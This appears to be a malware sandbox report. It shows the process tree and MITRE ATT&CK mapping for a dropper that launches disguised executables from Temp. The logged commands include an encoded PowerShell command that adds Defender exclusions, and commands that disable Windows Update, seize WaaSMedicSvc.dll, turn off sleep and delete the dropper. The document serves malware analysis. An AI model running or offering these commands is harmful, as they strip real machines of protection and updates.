C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:3012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:4848 -
C:\Windows\system32\sc.exesc stop wuauserv10⤵
- Launches sc.exe
PID:3024 -
C:\Windows\system32\sc.exesc stop bits10⤵
- Launches sc.exe
PID:4672 -
C:\Windows\system32\sc.exesc stop dosvc10⤵
- Launches sc.exe
PID:3268 -
C:\Windows\system32\sc.exesc stop UsoSvc10⤵
- Launches sc.exe
PID:3056 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:1808 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:2988 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:4472 -
C:\Windows\system32\sc.exesc config bits start= disabled10⤵
- Launches sc.exe
PID:1736 -
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""10⤵
- Launches sc.exe
PID:216 -
C:\Windows\system32\sc.exesc config dosvc start= disabled10⤵
- Launches sc.exe
PID:4808 -
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:2224 -
C:\Windows\system32\sc.exesc config UsoSvc start= disabled10⤵
- Launches sc.exe
PID:4864 -
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5060 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:952 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:4896 -
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2608 -
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3880 -
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f10⤵PID:1616
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f10⤵PID:1776
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f10⤵PID:5060
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f10⤵PID:3060
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f10⤵PID:4156
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f10⤵PID:4432
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE10⤵PID:2768
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE10⤵PID:3884
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE10⤵PID:4820
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE10⤵PID:1932
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE10⤵PID:1648
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE10⤵PID:1060
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE10⤵PID:1616
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 09⤵
- Power Settings
PID:3624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:464 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2212 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1076 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe9⤵PID:2492
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"10⤵PID:3556
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵PID:1352
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:4516 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:464
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\explorer.exeC:\Users\Admin\AppData\Local\Temp\explorer.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:628
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\windowshost.exeC:\Users\Admin\AppData\Local\Temp\windowshost.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\driverPerf\cominto.exe"C:\driverPerf\cominto.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3588
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3944
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4888
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4456
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3524
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4240
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4660
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4320
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2636
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4884
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter 1
- PowerShell 1
- Scheduled Task/Job 1
- Scheduled Task 1
- System Services 2
- Service Execution 2
Persistence
- Create or Modify System Process 2
- Windows Service 2
- Power Settings 1
- Scheduled Task/Job 1
- Scheduled Task 1
Privilege Escalation
- Create or Modify System Process 2
- Windows Service 2
- Scheduled Task/Job 1
- Scheduled Task 1
Defense Evasion
- File and Directory Permissions Modification 1
- Impair Defenses 1
- Obfuscated Files or Information 1
- Command Obfuscation 1
Downloads